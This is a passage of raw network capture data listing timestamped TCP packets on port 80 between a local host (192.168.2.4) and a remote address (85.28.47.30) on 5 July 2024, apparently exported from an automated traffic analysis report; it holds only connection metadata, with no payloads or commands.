                                                                Jul 5, 2024 04:36:06.181289911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181302071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181313038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181324005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181329012 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181350946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181376934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.276099920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.281354904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456223011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456255913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456268072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456279039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456285000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456290960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456302881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456311941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456317902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456331968 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456350088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456383944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456401110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456413984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456423044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456424952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456438065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456438065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456450939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456458092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456468105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456494093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456513882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456526041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456536055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456547022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456556082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456559896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456573009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456583977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456590891 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456599951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456619978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456625938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456638098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456648111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456648111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456660032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456671000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456690073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456712008 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456739902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456751108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456762075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456773043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456784964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456799030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456824064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456907988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456918955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456931114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456943035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456947088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456955910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456962109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456969023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456981897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.456981897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.456995010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457005978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457006931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457020998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457021952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457032919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457051992 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457071066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457082033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457082987 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457093954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457107067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457110882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457142115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457165956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457189083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457200050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457211018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457221985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457231998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457235098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457251072 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457281113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457330942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457343102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457354069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457367897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457379103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457382917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457396984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457397938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457413912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457425117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457428932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457437992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457443953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457448006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457463026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457469940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457493067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457513094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457573891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457587004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457597971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457611084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457622051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457626104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457636118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457644939 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457648039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457662106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457670927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457698107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457724094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457736969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457746029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457758904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457763910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457778931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457791090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457792044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457803965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457815886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457818031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457828045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457830906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457861900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457899094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457910061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.457937002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.457978964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458091974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458102942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458112955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458125114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458134890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458136082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458151102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458163023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458163977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458174944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458178043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458189011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458199978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458209991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458211899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458231926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458239079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458245993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458255053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458256006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458272934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458282948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458309889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458316088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458329916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458343029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458343983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458354950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458357096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458367109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458378077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458385944 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458404064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458417892 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458538055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458549023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458559990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458570004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458578110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458581924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458594084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458595991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458609104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458621025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458627939 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458642960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458646059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458652973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458664894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458672047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458678007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.458695889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458708048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.458735943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.548970938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.548985958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.548996925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549042940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549083948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549117088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549128056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549139023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549150944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549158096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549171925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549201012 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549284935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549298048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549326897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549343109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549420118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549459934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549616098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549626112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549638033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549654007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549665928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549685001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549801111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549813986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549825907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549845934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549860001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549873114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.549966097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549977064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549988031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.549998999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550004959 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550038099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550117016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550128937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550138950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550157070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550188065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550308943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550321102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550331116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550343990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550354004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550381899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550476074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550488949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550499916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550512075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550518036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550523043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550537109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550546885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550548077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550560951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550573111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550585985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550611019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550643921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550656080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550667048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550679922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550694942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550714016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550816059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550827980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550838947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550849915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550860882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550863028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550887108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550899029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.550980091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.550990105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551001072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551012993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551023006 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551047087 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551124096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551134109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551143885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551156044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551167011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551171064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551178932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551181078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551192999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551209927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551235914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551265955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551279068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551290035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551301956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551302910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551316023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551327944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551330090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551351070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551371098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551420927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551434040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551460981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551474094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551558018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551568985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551579952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551590919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551600933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551631927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551686049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551697969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551707983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551719904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551728010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551750898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551779985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551835060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551846981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551866055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551872969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551877975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.551894903 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551912069 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.551917076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552020073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552032948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552042961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552056074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552062035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552072048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552093983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552156925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552170992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552181005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552191973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552202940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552203894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552217007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552227020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552228928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552242994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552256107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552269936 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552279949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552301884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552316904 CEST4973080192.168.2.485.28.47.30
